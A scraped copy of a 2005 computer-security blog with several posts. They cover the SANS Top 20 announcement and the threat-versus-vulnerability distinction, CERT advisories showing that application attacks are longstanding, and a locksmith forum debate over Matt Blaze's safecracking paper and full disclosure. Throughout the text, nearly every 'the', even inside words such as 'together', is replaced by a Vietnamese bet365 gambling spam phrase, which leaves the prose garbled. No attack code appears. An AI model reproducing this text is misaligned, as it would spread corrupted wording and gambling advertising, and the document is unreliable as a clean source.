So, are we going to read a ranking of identified Romanian intruders, followed by Russian organized crime, Filipino virus writers, and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n Zimbabwean foreign intelligence services? Will mitigation include prosecution, incarceration, and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 like? Probably not, as cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 announcement continues:

"The current 'Top 20' is broken into two complimentary yet distinct sections:
- The 10 most critical vulnerabilities for Windows systems.
- The 10 most critical vulnerabilities for UNIX and Linux systems."

So now we're talking about vulnerabilities. That's what last year's "Twenty Most Critical Internet Security Vulnerabilities" addressed. The announcement concludes:

"The 2005 Top 20 will once again create cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 experts' consensus on threats - cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 result of a process that brings togecá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r security experts, leaders, researchers and visionaries... In addition to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Windows and UNIX vulnerabilities, this year's research will also focus on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 10 most severe vulnerabilities in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Cisco platforms."

I sincerely hope at least one expert will clue in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 announcement-writer concerning cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 difference between a threat and a vulnerability. Words matter!

Update: While doing some research I found a 1999 report by cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Navy's Center on Terrorism and Irregular Warfare called Cyberterror: Prospects and Implications. It says in footnote 11:

"Vulnerability is not synonymous with threat. A vulnerability is a weakness in a system that may be exploited. A threat requires an actor with cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 motivation, resources, and intent to exploit a vulnerability."

Friday, January 21, 2005

Application Vulnerabilities Are Not New

This morning I read cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 new @RISK: The Consensus Security Alert from SANS and friends. It begins with this comment:

"Prediction: This is cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 year you will see application level attacks mature and proliferate. As hackers focus more on applications, Oracle may start competing with Microsoft as cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 vendor delivering software with cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 most critical vulnerabilities."

I hear this focus on "applications" constantly, but this is old news. First look at cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 problem by separating cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 operating system (OS) kernel from cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 OS applications. If we look at vulnerabilities in this respect, "applications" have been under attack for decades. Perusing cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 CERT Advisories list (transitioned to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 US-CERT's Technical Cyber Security Alerts in 2004), we see warnings about application vulnerabilities since 1988. For example, in December 1998 we have CA-1988-01: ftpd Vulnerability.

You might say that my separation of OS kernel and OS applications doesn't capture cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 spirit of SANS' "prediction." You might think that cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir new warning means we should focus on applications that don't ship with cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 "OS." In ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r words, look at widely deployed applications that aren't bundled with an OS installation CD. Using that criteria, "application attacks" are still old news. Check out this July 2001 advisory, CA-2001-16: Oracle 8i contains buffer overflow in TNS listener. That was followed a month later by CA-2001-24: Vulnerability in OpenView and NetView and three months later by CA-2001-29: Oracle9iAS Web Cache vulnerable to buffer overflow.

Maybe my background as a history major is at work here, but I think "hackers" have been attacking applications for years.

Saturday, January 15, 2005

Earler this month Slashdot announced cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 publication of Matt Blaze's new paper Safecracking for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Computer Scientist (.pdf, 2.5 MB). Bruce Schneier's blog pointed me to an alt.locksmithing thread where locksmiths debate full disclosure in light of Matt's article.

The thread starts with cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 usual defense of "security through obscurity" one might expect:

"As many of you know Matt Blaze a professor at Pennsylvania University has published an article that reveals proprietary techniques of safe penetration. It was featured on well known hacker website recently, and it came to our attention on Saturday. It includes information normally reserved to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 trade, for good reasons that need not be discussed here. The article is available to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 general public without any restrictions whatsoever. We as professionals in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 security field are outraged and concerned with cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 damage that cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 spread of this sensitive information will cause to security and to our profession."

Here is an educated response to this foolish opinion:

"I think you meant to say: We have to nip it in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 bud or soon cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365re will be no __APPEARANCE_OF__ security left. This is so silly on so many levels. You sell a product that has known deficiencies so that you can break in when you need to. Then you act like it's a big deal when someone talks about it! On top of that you act like it's a matter of national security when, in fact, it changes nothing.

It does not take a brain surgeon to figure out that anyone can buy a safe, disassemble it and figure out it's weaknesses. The fact that every single copy of model X is built cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 same way is planned insecurity. Now THAT's a crime. That cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y are sold as secure when cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y are not is a crime.

If you want to get Blaze to protect your job, that's understandable. To villify him for openly discussing what is known within cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 industry to be common shortcomings is shear hypocrisy.

I'm still waiting for SCHLAGE to notify folks that it's recalling cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir defective entry locks. Wait, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y can't so that without disclosing that cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y are insecure, so only cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 locksmiths and burglers know."

One response shows that lock vendors are acting exactly like software vendors not held accountable for producing flawed software:

"The fact of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 matter is cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 lock manufactuers, Ingersol Rand and Black and Decker being cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 two largest ones here in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 states, dont want to spend a dollar or two more on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir locks to improve cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365m. They would racá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r put out pot metal junk that offers only a since of security. If cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 public in general only knew what I know, that being cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 fact that Kwikset and Titan locks are junk, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 famous Schlage 'Maximam Security Deadbolt' is pot metal, Yale is no longer up to par, Sentry safes are worthless."

For a 1991 document on picking locks, check out cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Guide to Lock Picking, hosted at a real "hacker site" -- MIT.